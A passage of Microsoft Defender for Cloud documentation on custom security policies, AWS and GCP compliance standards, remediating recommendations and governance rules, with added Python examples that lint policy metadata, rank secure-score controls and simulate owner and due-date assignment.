        "Severity": "High"
      }
    },
    "parameters": {
      "expressRouteLockLevel": {
        "type": "String",
        "metadata": {
          "displayName": "Lock level",
          "description": "Required lock level for ExpressRoute resource groups."
        },
        "allowedValues": [
          "CanNotDelete",
          "ReadOnly"
        ]
      }
    },
    "policyRule": {
      "if": {
        "field": "type",
        "equals": "Microsoft.Resources/subscriptions/resourceGroups"
      },
      "then": {
        "effect": "auditIfNotExists",
        "details": {
          "type": "Microsoft.Authorization/locks",
          "existenceCondition": {
            "field": "Microsoft.Authorization/locks/level",
            "equals": "[parameters('expressRouteLockLevel')]"
          }
        }
      }
    }
  }
}


For another example of using the securityCenter property, see this section of the REST 
API documentation. 
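Since the two fields are written by hand into policy JSON and then pushed through the REST API, a typo in the property name or an out-of-range Severity value simply produces a recommendation with no severity or remediation text. The following added example (not code from Defender for Cloud, Azure Policy or the documentation) injects and lints the securityCenter block on a policy definition dict; the sample policy is constructed after the resource-group lock example above, and the helper names are the author's own. 

```python
import copy
import json

# The only Severity values the page lists for the securityCenter block.
ALLOWED_SEVERITIES = {"Low", "Medium", "High"}

# Constructed, trimmed-down policy definition modelled on the resource-group
# lock audit above; sample input for the helpers, not a live definition.
SAMPLE_POLICY = {
    "properties": {
        "displayName": "Security - ERvNet - AuditRGLock",
        "policyType": "Custom",
        "mode": "All",
        "description": "Audit required resource groups lock",
        "policyRule": {
            "if": {"field": "type",
                   "equals": "Microsoft.Resources/subscriptions/resourceGroups"},
            "then": {"effect": "auditIfNotExists",
                     "details": {"type": "Microsoft.Authorization/locks"}},
        },
    }
}


def add_security_center_metadata(policy, remediation, severity):
    """Return a copy of the policy definition carrying the securityCenter
    metadata Defender for Cloud reads for custom recommendations. Other
    metadata keys are left untouched; the input dict is not modified."""
    if not isinstance(remediation, str) or not remediation.strip():
        raise ValueError("RemediationDescription must be a non-empty string")
    if severity not in ALLOWED_SEVERITIES:
        raise ValueError(f"Severity must be one of {sorted(ALLOWED_SEVERITIES)}, got {severity!r}")
    out = copy.deepcopy(policy)
    metadata = out["properties"].setdefault("metadata", {})
    metadata["securityCenter"] = {
        "RemediationDescription": remediation,
        "Severity": severity,
    }
    return out


def check_security_center_metadata(policy):
    """Lint a policy definition before submitting it: return the list of
    problems with its securityCenter block (empty list means well-formed)."""
    problems = []
    sc = policy.get("properties", {}).get("metadata", {}).get("securityCenter")
    if sc is None:
        return ["metadata.securityCenter is missing"]
    rd = sc.get("RemediationDescription")
    if not isinstance(rd, str) or not rd.strip():
        problems.append("RemediationDescription must be a non-empty string")
    if sc.get("Severity") not in ALLOWED_SEVERITIES:
        problems.append(f"Severity must be one of {sorted(ALLOWED_SEVERITIES)}")
    return problems


if __name__ == "__main__":
    enriched = add_security_center_metadata(
        SAMPLE_POLICY,
        "Resource Group locks can be set via Azure Portal -> Resource Group -> Locks",
        "High",
    )
    print(json.dumps(enriched["properties"]["metadata"], indent=2))
    print(check_security_center_metadata(enriched))
```

Run `check_security_center_metadata` over every policy in a custom initiative before assignment; a definition that fails the lint still deploys, it just surfaces as a recommendation without the detail you intended. 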


Next steps 
In this article, you learned how to create custom security policies. 
For other related material, see the following articles: 


• The overview of security policies 
• A list of the built-in security policies 


Manage AWS assessments and 
standards 


Article • 03/09/2023 


Security standards contain comprehensive sets of security recommendations to help 
secure your cloud environments. Security teams can use the readily available standards 
such as AWS CIS 1.2.0, AWS CIS 1.5.0, AWS Foundational Security Best Practices, and 
AWS PCI DSS 3.2.1. 


There are two types of resources that are needed to create and manage assessments: 


• Standard: defines a set of assessments 
• Standard assignment: defines the scope which the standard evaluates. For example, specific AWS account(s). 


Create a custom compliance standard to your 
AWS account 


To create a custom compliance standard to your AWS account: 

1. Sign in to the Azure portal. 
2. Navigate to Microsoft Defender for Cloud > Environment settings. 
3. Select the relevant AWS account. 

4. Select Standards > + Create > Standard. 

[Screenshot: Settings | Standards for the AWS account, alongside Defender plans, Policy settings and Governance rules (preview)] 

5. Enter a name, description and select built-in recommendations from the drop-down menu. 


[Screenshot: the "Create new standard" pane open over the Standards list (showing 1-10 of 15 items). The list mixes custom standards with AWS CIS 1.2.0, AWS CIS 1.5.0, AWS PCI DSS 3.2.1, AWS Foundational Security Best Practices and AWS NIST SP 800 53 R5 (preview), each with a recommendation count and a type of Custom, Compliance or Default. The Recommendations drop-down in the pane lists built-in recommendations such as "Amazon Aurora clusters should have backtracking enabled", "Amazon EBS snapshots should not be publicly restorable", "Amazon EFS should be configured to encrypt file data at rest using AWS KMS" and "Amazon Elasticsearch Service domains should be in a VPC", with Create and Cancel buttons.]


6. Select Create. 


Assign a built-in compliance standard to your 
AWS account 


To assign a built-in compliance standard to your AWS account: 


1. Sign in to the Azure portal. 


2. Navigate to Microsoft Defender for Cloud > Environment settings. 
3. Select the relevant AWS account. 


4. Select Standards. 


5. Select the three dot button for the built-in standard you want to assign. 


[Screenshot: Settings | Standards for the AWS account (showing 1-10 of 15 items), with columns Name, Recommendations, Type and Assigned on: AWS CIS 1.2.0 (45, Compliance, Not assigned); AWS CIS 1.5.0 (56, Compliance, Account); AWS NIST SP 800 53 R5 (preview) (89, Compliance, Account); AWS PCI DSS 3.2.1 (44, Compliance, Not assigned). The three-dot menu is open on one of the rows.]


6. Select Assign standard. 




7. Select Yes. 


Next steps 


In this article, you learned how to manage your assessments and standards in Defender 
for Cloud. 


Find recommendations that can improve your security posture 


Manage GCP assessments and standards 
Security standards contain comprehensive sets of security recommendations to help 
secure your cloud environments. Security teams can use the readily available regulatory 
standards such as GCP CIS 1.1.0 and GCP CIS 1.2.0, or create custom standards to meet 
specific internal requirements. 


There are two types of resources that are needed to create and manage standards: 


• Standard: defines a set of assessments 
• Standard assignment: defines the scope which the standard evaluates. For example, specific GCP projects. 


Create a custom compliance standard to your 
GCP project 
To create a custom compliance standard to your GCP project: 

1. Sign in to the Azure portal. 

2. Navigate to Microsoft Defender for Cloud > Environment settings. 

3. Select the relevant GCP project. 

4. Select Standards > + Create > Standard. 

[Screenshot: Settings | Standards for the GCP project, with the + Create menu open] 

5. Enter a name, description and select built-in recommendations from the drop-down menu. 


[Screenshot: the "Create new standard" pane with Name, Description and Recommendations fields. The Recommendations drop-down lists built-in GCP recommendations such as "Cluster hosts should be configured to use only private, internal IP addresses", "Compute Engine VMs should use the Container-Optimized OS", "Control Plane Authorized Networks should be enabled on GKE clusters", "Cryptographic keys should not have more than three users", "Egress deny rule should be set on a firewall to block unwanted outbound traffic", "Ensure 'Block Project-wide SSH keys' is enabled for VM instances" and "Ensure 'Enable connecting to serial ports' is not enabled for VM Instance", with Create and Cancel buttons.]


6. Select Create. 


Assign a built-in compliance standard to your 
GCP project 


To assign a built-in compliance standard to your GCP project: 


1. Sign in to the Azure portal. 

2. Navigate to Microsoft Defender for Cloud > Environment settings. 
3. Select the relevant GCP project. 

4. Select Standards. 


5. Select the three dot button for the built-in standard you want to assign. 


[Screenshot: Settings | Standards for the GCP project (showing 1-10 of 16 items), with columns Name, Recommendations, Type and Assigned on: GCP CIS 1.1.0 (61, Compliance, Account); GCP CIS 1.2.0 (78, Compliance, Account); GCP ISO 27001 (preview) (44, Compliance, Not assigned); GCP NIST 800 53 (preview) (43, Compliance, Not assigned); GCP PCI DSS 3.2.1 (preview) (52, Compliance, Not assigned). The three-dot menu is open on one of the rows.]


6. Select Assign standard. 


7. Select Yes. 


Next steps 


In this article, you learned how to manage your assessments and standards in Defender 
for Cloud. 


Find recommendations that can improve your security posture 


Find recommendations that can 
improve your security posture 
To improve your secure score, you have to implement the security recommendations for 
your environment. From the list of recommendations, you can use filters to find the 
recommendations that have the most impact on your score, or the ones that you were 
assigned to implement. 

To get to the list of recommendations: 

1. Sign in to the Azure portal. 
2. Either: 

   • In the Defender for Cloud overview, select Security posture and then select View recommendations for the environment you want to improve. 
   • Go to Recommendations in the Defender for Cloud menu. 


You can search for specific recommendations by name. Use the search box and filters 
above the list of recommendations to find specific recommendations. Look at the details 
of the recommendation to decide whether to remediate it, exempt resources, or disable 
the recommendation. 


You can learn more by watching this video from the Defender for Cloud in the Field 
video series: 


• Security posture management improvements 


Finding recommendations with high impact on 
your secure score 


Your secure score is calculated based on the security recommendations that you've 
implemented. In order to increase your score and improve your security posture, you 
have to find recommendations with unhealthy resources and remediate those 
recommendations. 


The list of recommendations shows the Potential score increase that you can achieve 
when you remediate all of the recommendations in the security control. 


To find recommendations that can improve your secure score: 


1. In the list of recommendations, use the Potential score increase to identify the security control that contains recommendations that will increase your secure score. 

   • You can also use the search box and filters above the list of recommendations to find specific recommendations. 

2. Open a security control to see the recommendations that have unhealthy resources. 


When you remediate all of the recommendations in the security control, your secure 
score increases by the percentage point listed for the control. 
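The ranking the portal does for you, as an added Python example that is not code from the Defender for Cloud documentation or product. It assumes the scoring formula published in the secure score documentation, which this page doesn't restate: a control's current score is its max score scaled by the share of its resources that are healthy, and the potential score increase is the points still missing from that control as a percentage of the total max score of all applicable controls. Treating a control with no resources as not applicable is also an assumption, and the control names and resource counts are constructed sample data.

```python
"""Rank secure score controls by potential score increase (added example).

Assumed formula (from the secure score documentation, not restated on this page):
  current score of a control = max score * healthy / (healthy + unhealthy)
  overall secure score        = sum(current) / sum(max) over applicable controls
  potential score increase    = (max - current) / sum(max), in percentage points
"""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Control:
    name: str
    max_score: float
    healthy: int      # resources already healthy for this control
    unhealthy: int    # resources that still need remediation

    @property
    def applicable(self) -> bool:
        # Assumption: a control with no resources is "not applicable" and is
        # left out of both the current score and the maximum score.
        return self.healthy + self.unhealthy > 0

    @property
    def current_score(self) -> float:
        if not self.applicable:
            return 0.0
        return self.max_score * self.healthy / (self.healthy + self.unhealthy)


def total_max(controls: List[Control]) -> float:
    return sum(c.max_score for c in controls if c.applicable)


def secure_score(controls: List[Control]) -> float:
    """Overall secure score as a percentage."""
    denominator = total_max(controls)
    if denominator == 0:
        return 0.0
    return 100.0 * sum(c.current_score for c in controls) / denominator


def potential_increase(control: Control, controls: List[Control]) -> float:
    """Percentage points gained if every resource in `control` becomes healthy."""
    if not control.applicable:
        return 0.0
    return 100.0 * (control.max_score - control.current_score) / total_max(controls)


def rank_by_potential_increase(controls: List[Control]) -> List[Tuple[str, float]]:
    """Controls ordered by the score gain from remediating them, highest first."""
    ranked = sorted(controls, key=lambda c: potential_increase(c, controls), reverse=True)
    return [(c.name, round(potential_increase(c, controls), 2)) for c in ranked]


def score_after_remediating(controls: List[Control], name: str) -> float:
    """Secure score once all resources in the named control are healthy."""
    updated = [
        Control(c.name, c.max_score, c.healthy + c.unhealthy, 0) if c.name == name else c
        for c in controls
    ]
    return secure_score(updated)


# Constructed sample data; the counts do not come from any real environment.
SAMPLE_CONTROLS = [
    Control("Enable MFA", 10, healthy=2, unhealthy=8),
    Control("Secure management ports", 8, healthy=4, unhealthy=4),
    Control("Apply system updates", 6, healthy=6, unhealthy=0),
    Control("Remediate vulnerabilities", 6, healthy=1, unhealthy=3),
    Control("Encrypt data in transit", 4, healthy=0, unhealthy=0),  # not applicable
]

if __name__ == "__main__":
    print(f"secure score: {secure_score(SAMPLE_CONTROLS):.1f}%")
    for control_name, gain in rank_by_potential_increase(SAMPLE_CONTROLS):
        print(f"  +{gain:5.2f}%  {control_name}")
    after = score_after_remediating(SAMPLE_CONTROLS, "Enable MFA")
    print(f"after remediating Enable MFA: {after:.1f}%")
```

With the sample data the score is 45% and fully remediating "Enable MFA" is worth 26.67 points, which is exactly the gap between the current score and the score after remediation, the relationship the paragraph above describes.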


Manage the owner and ETA of 
recommendations that are assigned to you 


Security teams can assign a recommendation to a specific person and assign a due date 
to drive your organization towards increased security. If you have recommendations 
assigned to you, you're accountable to remediate the resources affected by the 
recommendations to help your organization be compliant with the security policy. 


Recommendations are listed as On time until their due date passes, when they change to
Overdue. If the security team applied a grace period when assigning the recommendation,
the affected resources don't count against the secure score until the recommendation
becomes overdue.


To help you plan your work and report on progress, you can set an ETA for the specific 
resources to show when you plan to have the recommendation resolved by for those 
resources. You can also change the owner of the recommendation for specific resources 
so that the person responsible for remediation is assigned to the resource. 


[Screenshot: the recommendation "Management ports of EC2 instances should be protected" (severity High, freshness interval 6 hours) with its list of unhealthy AWS EC2 instances, and the Change owner and set ETA pane open. The pane lets you assign a new owner and/or define an estimated date by when the selected resources will be resolved: Change owner (owner email address), Change ETA (estimated remediation time and a justification), and a note that a weekly email is sent to the specified owners with all the recommendations assigned to them. The toolbar offers Fix, Trigger logic app, Assign owner, and Change owner and set ETA.]
| 


To change the owner of resources and set the ETA for remediation of recommendations
that are assigned to you:

1. In the filters for the list of recommendations, select Show my items only.

   • The status column indicates the recommendations that are on time, overdue,
     or completed.
   • The insights column indicates the recommendations that are in a grace
     period, so they currently don't affect your secure score until they become
     overdue.

2. Select an on time or overdue recommendation.

3. For the resources that are assigned to you, set the owner of the resource:
   a. Select the resources that are owned by another person, and select Change
      owner and set ETA.
   b. Select Change owner, enter the email address of the owner of the resource, and
      select Save.

   The owner of the resource gets a weekly email listing the recommendations that
   they're assigned.

4. For resources that you own, set an ETA for remediation:
   a. Select the resources that you plan to remediate by the same date, and select
      Change owner and set ETA.
   b. Select Change ETA and set the date by which you plan to remediate the
      recommendation for those resources.
   c. Enter a justification for the remediation by that date, and select Save.

The due date for the recommendation doesn't change, but the security team can see
that you plan to update the resources by the specified ETA date.


Review recommendation data in Azure 
Resource Graph (ARG) 


You can open the recommendation data in ARG either from the Recommendations page or from
an individual recommendation.


The toolbar on the Recommendations page includes an Open query button to explore 
the details in Azure Resource Graph (ARG), an Azure service that gives you the ability to 
query - across multiple subscriptions - Defender for Cloud's security posture data. 


ARG is designed to provide efficient resource exploration with the ability to query at 
scale across your cloud environments with robust filtering, grouping, and sorting 
capabilities. It's a quick and efficient way to query information across Azure 
subscriptions programmatically or from within the Azure portal. 


Using the Kusto Query Language (KQL), you can cross-reference Defender for Cloud 
data with other resource properties. 


For example, this recommendation details page shows 15 affected resources: 


[Screenshot: the recommendation "MFA should be enabled on accounts with write permissions on your subscription", with the toolbar buttons Exempt, View policy definition and Open query. Description: "Multi-Factor Authentication (MFA) should be enabled for all subscription accounts with write privileges to prevent a breach of accounts or resources." Affected resources: Unhealthy resources (0), Healthy resources (12), Not applicable resources (3); the Unhealthy tab shows "No resources found."]


When you open the underlying query, and run it, Azure Resource Graph Explorer returns 
the same 15 resources and their health status for this recommendation: 


[Screenshot: Azure Resource Graph Explorer with the recommendation's query open. Only the first ten lines of the query are legible:]

    securityresources
    | where type == "microsoft.security/assessments"
    | extend source = tostring(properties.resourceDetails.Source)
    | extend resourceId =
        trim(" ", tolower(tostring(case(source =~ "azure", properties.resourceDetails.Id,
                                        source =~ "aws", properties.resourceDetails.AzureResourceId,
                                        source =~ "gcp", properties.resourceDetails.AzureResourceId,
                                        extract("^(.+)/providers/Microsoft.Security/assessments/.+$", 1, id)))))
    | extend status = trim(" ", tostring(properties.status.code))
    | extend cause = trim(" ", tostring(properties.status.cause))

[The results grid reports Results: 15 (Duration: 00:00.652) with the columns id, name, type, tenantId, status, location and resourceGroup; the status column shows values such as Healthy and NotApplicable. Results can be downloaded as CSV or pinned to a dashboard.]


Recommendation insights 


The Insights column of the page gives you more details for each recommendation. The
options available in this section include:

Name                       Description
Preview recommendation     This recommendation won't affect your secure score until it's GA.
Fix                        From within the recommendation details page, you can use Fix to
                           resolve this issue.
Enforce                    From within the recommendation details page, you can automatically
                           deploy a policy to fix this issue whenever someone creates a
                           non-compliant resource.
Deny                       From within the recommendation details page, you can prevent new
                           resources from being created with this issue.

Recommendations that aren't included in the calculation of your secure score (such as
preview recommendations) should still be remediated wherever possible, so that when the
preview period ends they contribute towards your score instead of against it.


Download recommendations to a CSV report 


Recommendations can be downloaded to a CSV report from the Recommendations 
page. 


To download a CSV report of your recommendations: 
1. Sign in to the Azure portal £. 
2. Navigate to Microsoft Defender for Cloud > Recommendations. 


3. Select Download CSV report. 


[Screenshot: Microsoft Defender for Cloud > Recommendations, showing one subscription, with the toolbar buttons Refresh, Download CSV report, Open query, and Guides & Feedback above the Secure score recommendations and All recommendations tabs.]


You'll know the report is being prepared when the pop-up appears. 


Preparing CSV report for download

Preparing your CSV report. This may take a while.
Recommendations from all filtered subscriptions will be
included in the report.


When the report is ready, you'll be notified by a second pop-up. 


Downloading CSV report

Your CSV report is ready and will now begin
downloading.


Learn more 


You can check out the following blogs:

• Security posture management and server protection for AWS and GCP are now
  generally available
• New enhancements added to network security dashboard


Next steps


In this document, you were introduced to security recommendations in Defender for
Cloud. For related information:

• Remediate recommendations - Learn how to remediate the security recommendations
  for your Azure subscriptions and resource groups.
• Prevent misconfigurations with Enforce/Deny recommendations.
• Automate responses to Defender for Cloud triggers - Automate responses to
  recommendations.
• Exempt a resource from a recommendation.
• Security recommendations - a reference guide.


Implement security recommendations in 
Microsoft Defender for Cloud 
Recommendations give you suggestions on how to better secure your resources. You
implement a recommendation by following the remediation steps provided in the
recommendation.


Remediation steps 


After reviewing all the recommendations, decide which one to remediate first. We
recommend that you prioritize the security controls with the highest potential to
increase your secure score.


1. From the list, select a recommendation.


2. Follow the instructions in the Remediation steps section. Each recommendation
   has its own set of instructions. The following screenshot shows the remediation steps
   for requiring secure transfer (HTTPS) to storage accounts.


[Screenshot: the recommendation "Secure transfer to storage accounts should be enabled" (severity High, freshness interval 30 min, 75 exempted resources with a View all exemptions link; tactics and techniques: Credential Access), with the toolbar buttons Exempt, Deny, View policy definition and Open query. The Remediation steps section reads:]

Note: After the process completes, it may take up to 30 min until your resources move to the 'healthy resources' tab.

Quick fix logic

Manual remediation:

To enable secure transfer required:

1. In your storage account, go to the 'Configuration' page.

2. Enable 'Secure transfer required'.

[Below the steps: "Was this recommendation useful? Yes / No".]


3. Once completed, a notification appears informing you whether the issue is 
resolved. 


Fix button 


To simplify remediation and improve your environment's security (and increase your 
secure score), many recommendations include a Fix option. 


Fix helps you quickly remediate a recommendation on multiple resources. 


To implement a Fix:


1. From the list of recommendations that have the Fix action icon, select a
   recommendation.


[Screenshot: Microsoft Defender for Cloud > Recommendations, showing 11 subscriptions, with a security control expanded on the Secure score recommendations tab. Each recommendation in the control shows its governance status (Overdue, Completed or Unassigned) and its unhealthy resource count, for example 0 of 38 virtual machines, 0 of 12 SQL databases, 1 of 4 AWS DAX clusters, 9 of 12 AWS SNS topics and 99 of 241 AWS EC2 volumes; recommendations that support Fix show the Fix icon. The toolbar offers Refresh, Download CSV report, Open query, Governance report (preview), and Guides & Feedback.]


2. From the Unhealthy resources tab, select the resources that you want to
   implement the recommendation on, and select Fix.


   Note

   Some of the listed resources might be disabled, because you don't have the
   appropriate permissions to modify them.


3. In the confirmation box, read the remediation details and implications. 


[Screenshot: the recommendation "CloudFront distributions should require encryption in transit" (severity Medium, freshness interval 6 hours; tactics and techniques: Discovery +2) with the toolbar buttons Exempt and Open query. The affected resources list shows AWS CloudFront distributions by name, AWS account, connector name (securityConnector), region (global) and resource type, with the action buttons Fix, Trigger logic app, Exempt, Assign owner, and Change owner and set ETA below the list.]


Note


The implications are listed in the grey box in the Fixing resources window that
opens after you select Fix. They list what changes happen when you proceed with
the Fix.


[Screenshot: the Fixing resources window for one resource, "Enable encryption in transit on selected CloudFront distributions". Parameters: Viewer protocol policy (HTTPS only, or Redirect HTTP to HTTPS). Selected resources: one CloudFront distribution. At the bottom: "Download remediation logic for 1 resource", Fix, and Cancel.]


4. Insert the relevant parameters if necessary, and approve the remediation. 


O Note 


It can take several minutes after remediation completes to see the resources 
in the Healthy resources tab. To view the remediation actions, check the 
activity log. 


5. Once completed, a notification appears informing you if the remediation 
succeeded. 


Fix actions logged to the activity log


The remediation operation uses a template deployment or a REST API PATCH request to
apply the configuration on the resource. These operations are logged in the Azure
activity log.


Next steps 


In this document, you were shown how to remediate recommendations in Defender for
Cloud. To learn how recommendations are defined and selected for your environment,
see the following page:


• What are security policies, initiatives, and recommendations?


Drive remediation with security 
governance 


Article • 03/30/2023


Security teams are responsible for improving the security posture of their organizations,
but they may not have the resources or authority to actually implement security
recommendations. Assigning owners with due dates and defining governance rules
creates accountability and transparency so you can drive the process of improving the
security posture in your organization.


Stay on top of the progress on the recommendations in the security posture. Weekly
email notifications to the owners and their managers make sure that they take timely
action on the recommendations that can improve your security posture.


You can learn more by watching this video from the Defender for Cloud in the Field
video series:


• Remediate Security Recommendations with Governance


Building an automated process for improving 
security with governance rules 


To make sure your organization is systematically improving its security posture, you can 
define rules that assign an owner and set the due date for resources in the specified 
recommendations. That way resource owners have a clear set of tasks and deadlines for 
remediating recommendations. 


You can then review the progress of the tasks by subscription, recommendation, or 
owner so you can follow up with tasks that need more attention. 


Availability


Aspect                            Details
Release state:                    General availability (GA)
Prerequisite:                     Requires the Defender Cloud Security Posture Management (CSPM)
                                  plan to be enabled.
Required roles and permissions:   Azure - Contributor, Security Admin, or Owner on the subscription
                                  AWS, GCP - Contributor, Security Admin, or Owner on the connector
Clouds:                           ✔ Commercial clouds
                                  ✘ National (Azure Government, Azure China 21Vianet)
                                  ✔ Connected AWS accounts
                                  ✔ Connected GCP accounts


Note


Starting January 1, 2023, governance capabilities require Defender Cloud
Security Posture Management (CSPM) plan enablement. For customers who keep the
Defender CSPM plan off on scopes with governance content:

• Existing assignments remain as is and continue to work, with no customization
  option or ability to create new ones.
• Existing rules remain as is but won't trigger new assignment creation.


Defining governance rules to automatically set the owner 
and due date of recommendations 


Governance rules can identify resources that require remediation according to specific
recommendations or severities. The rule assigns an owner and due date to ensure the
recommendations are handled. Many governance rules can apply to the same
recommendations, so the rule with the lowest priority value is the one that assigns the
owner and due date.


The due date set for the recommendation to be remediated is based on a timeframe of
7, 14, 30, or 90 days from when the recommendation is found by the rule. For example,
if the rule identifies the resource on March 1 and the remediation timeframe is 14 days,
March 15 is the due date. You can apply a grace period so that the resources that are
given a due date don't affect your secure score until they're overdue.


You can also set the owner of the resources that are affected by the specified
recommendations. In organizations that use resource tags to associate resources with an
owner, you can specify the tag key and the governance rule reads the name of the
resource owner from the tag.


The owner is shown as unspecified when the owner wasn't found on the resource, the
associated resource group, or the associated subscription based on the specified tag.


[Screenshot: Microsoft Defender for Cloud > Security posture, showing 11 subscriptions, with the tabs Secure score, Environment, Governance (preview) and Owner (preview). The Governance tab summarizes total recommendations, overdue recommendations, unassigned recommendations, unhealthy resources and attack paths per environment (Azure, AWS, GCP); the Owner tab lists owners with their overdue recommendations, affected resources and recommendations. The toolbar offers Secure score over time, Governance report (preview), and Guides & Feedback.]


By default, email notifications are sent to the resource owners weekly to provide a list of 
the on time and overdue tasks. If an email for the owner's manager is found in the 
organizational Azure Active Directory (Azure AD), the owner's manager receives a 
weekly email showing any overdue recommendations by default. 


[Screenshot: Environment settings > Governance rules, listing enabled rules with their name, environment (Azure, AWS or GCP), scope, priority and affected recommendations, for example "Remediate AWS database issues" on an AWS account and "Enable diagnostic logs on ERP subscriptions" on an Azure scope. The toolbar offers Add governance rule, Refresh, Governance report (preview), and Guides & Feedback. Alongside, the Create governance rule pane is open at its General details and Conditions steps, with an Impacted recommendations filter.]


To define a governance rule that assigns an owner and due date:

1. Navigate to Environment settings > Governance rules.
2. Select Create governance rule.
3. Enter a name for the rule.
4. Select a scope to apply the rule to and use exclusions if needed. Rules for a
   management scope (Azure management groups, AWS master accounts, GCP
   organizations) are applied prior to the rules on a single scope.
5. Priority is assigned automatically after scope selection. You can override this field if
   needed.
6. Select the recommendations that the rule applies to, either:

   • By severity - The rule assigns the owner and due date to any
     recommendation in the subscription that doesn't already have them
     assigned.
   • By specific recommendations - Select the specific recommendations that the
     rule applies to.

7. Set the owner to assign to the recommendations, either:

   • By resource tag - Enter the resource tag on your resources that defines the
     resource owner.
   • By email address - Enter the email address of the owner to assign to the
     recommendations.

8. Set the remediation timeframe, which is the time between when the resources are
   identified to require remediation and the time that the remediation is due.
9. If you don't want the resources to affect your secure score until they're overdue,
   select Apply grace period.
10. If you don't want either the owner or the owner's manager to receive weekly
    emails, clear the notification options.
11. Select Create.


If there are existing recommendations that match the definition of the governance rule,
you can either:

• Assign an owner and due date to recommendations that don't already have an
  owner or due date.
• Overwrite the owner and due date of existing recommendations.


Note


When you delete or disable a rule, all existing assignments and notifications
remain.


Tip


Here are some sample use-cases for the at-scale experience:

• View and manage all governance rules effective in the organization using a
  single page.
• Create and apply rules on multiple scopes at once using management scopes
  across clouds.
• Check the effective rules on a selected scope using the scope filter.


To view the effect of rules on a specific scope, use the Scope filter to select a specific
scope.


Conflicting rules are applied in priority order. Rules on a management scope (Azure
management groups, AWS master accounts, GCP organizations) take effect before rules
on a single scope (Azure subscriptions, AWS accounts, GCP projects); within a scope, the
rule with the lowest priority value wins.
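The assignment logic described in this section (matching by severity or by specific recommendation, management-scope rules before single-scope rules and the lowest priority value winning, owner lookup from a tag on the resource, its resource group and then its subscription, a due date of 7/14/30/90 days from discovery) together with the On time / Overdue status and grace period behaviour described earlier under "Manage the owner and ETA of recommendations that are assigned to you", as an added Python example. This is not code from the Defender for Cloud documentation or product: rule names, tags, email addresses and dates are constructed, and how the product breaks ties beyond what the page states is not modelled.

```python
"""Governance-rule assignment, On time/Overdue status and grace period (added example)."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, FrozenSet, List, Optional

TIMEFRAMES = {7, 14, 30, 90}   # remediation timeframes the rule editor offers
UNSPECIFIED = "unspecified"    # owner shown when the tag is found nowhere


@dataclass(frozen=True)
class Resource:
    resource_id: str
    tags: Dict[str, str]
    resource_group_tags: Dict[str, str]
    subscription_tags: Dict[str, str]


@dataclass(frozen=True)
class Finding:
    recommendation: str
    severity: str          # "High", "Medium" or "Low"
    resource: Resource
    found_on: date         # date the rule first saw the unhealthy resource


@dataclass(frozen=True)
class Rule:
    name: str
    priority: int                                  # lower value wins within a scope
    management_scope: bool = False                 # mgmt group / AWS master account / GCP org
    severities: FrozenSet[str] = frozenset()       # "by severity" rule
    recommendations: FrozenSet[str] = frozenset()  # "by specific recommendations" rule
    owner_email: Optional[str] = None              # owner "by email address"
    owner_tag: Optional[str] = None                # owner "by resource tag"
    timeframe_days: int = 14
    grace_period: bool = False

    def __post_init__(self) -> None:
        if self.timeframe_days not in TIMEFRAMES:
            raise ValueError(f"timeframe must be one of {sorted(TIMEFRAMES)} days")
        if (self.owner_email is None) == (self.owner_tag is None):
            raise ValueError("set exactly one of owner_email or owner_tag")

    def matches(self, finding: Finding) -> bool:
        return finding.severity in self.severities or finding.recommendation in self.recommendations


@dataclass(frozen=True)
class Assignment:
    owner: str
    due_date: date
    grace_period: bool
    rule: str


def resolve_owner(rule: Rule, resource: Resource) -> str:
    """Fixed email, or the tag value from the resource, then its resource group, then its subscription."""
    if rule.owner_email:
        return rule.owner_email
    for tags in (resource.tags, resource.resource_group_tags, resource.subscription_tags):
        if rule.owner_tag in tags:
            return tags[rule.owner_tag]
    return UNSPECIFIED


def effective_rule(rules: List[Rule], finding: Finding) -> Optional[Rule]:
    """Management-scope rules apply first; within a scope the lowest priority value wins."""
    for rule in sorted(rules, key=lambda r: (not r.management_scope, r.priority)):
        if rule.matches(finding):
            return rule
    return None


def assign(finding: Finding, rules: List[Rule], existing: Optional[Assignment] = None,
           overwrite: bool = False) -> Optional[Assignment]:
    """Apply the effective rule; keep an existing owner/due date unless overwrite is requested."""
    if existing is not None and not overwrite:
        return existing
    rule = effective_rule(rules, finding)
    if rule is None:
        return existing
    return Assignment(resolve_owner(rule, finding.resource),
                      finding.found_on + timedelta(days=rule.timeframe_days),
                      rule.grace_period, rule.name)


def status(assignment: Assignment, today: date, completed: bool = False) -> str:
    if completed:
        return "Completed"
    return "On time" if today <= assignment.due_date else "Overdue"


def affects_secure_score(assignment: Assignment, today: date, completed: bool = False) -> bool:
    """An unhealthy resource counts against the score unless it is on time under a grace period."""
    if completed:
        return False
    return not (assignment.grace_period and status(assignment, today) == "On time")


# Constructed sample rules, resources and findings (not from any real tenant).
MFA_REC = "MFA should be enabled on accounts with write permissions on your subscription"
RULES = [
    Rule("Remediate high severity", priority=10, severities=frozenset({"High"}),
         owner_tag="owner", timeframe_days=14, grace_period=True),
    Rule("Org-wide MFA", priority=50, management_scope=True, recommendations=frozenset({MFA_REC}),
         owner_email="iam@contoso.example", timeframe_days=7),
    Rule("Medium catch-all", priority=20, severities=frozenset({"Medium"}),
         owner_email="secops@contoso.example", timeframe_days=30),
]
FOUND = date(2023, 3, 1)
FINDINGS = [
    Finding(MFA_REC, "High", Resource("sub-1", {"owner": "alice@contoso.example"}, {}, {}), FOUND),
    Finding("Secure transfer to storage accounts should be enabled", "High",
            Resource("storage-1", {}, {"owner": "bob@contoso.example"}, {}), FOUND),
    Finding("Auditing on SQL server should be enabled", "Medium", Resource("sql-1", {}, {}, {}), FOUND),
    Finding("Management ports of EC2 instances should be protected", "High",
            Resource("i-0123", {}, {}, {}), FOUND),
    Finding("Diagnostic logs should be enabled", "Low", Resource("vault-1", {}, {}, {}), FOUND),
]

if __name__ == "__main__":
    today = date(2023, 3, 16)
    for f in FINDINGS:
        a = assign(f, RULES)
        summary = "no matching rule" if a is None else (
            f"{a.owner:24} due {a.due_date}  {status(a, today):8}  "
            f"affects score: {affects_secure_score(a, today)}")
        print(f"{f.recommendation[:45]:45}  {summary}")
```

Run as a script, it shows the MFA finding going to the management-scope rule even though its priority value is higher, the storage finding inheriting its owner from the resource group tag and staying out of the score until March 15 thanks to the grace period, the EC2 finding landing on "unspecified" because no tag exists at any level, and the Low finding receiving no assignment at all.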


Manually assigning owners and due dates for 
recommendation remediation 


For every resource affected by a recommendation, you can assign an owner and a due
date so that you know who needs to implement the security changes to improve your
security posture and when they're expected to do it by. You can also apply a grace
period so that the resources that are given a due date don't affect your secure score
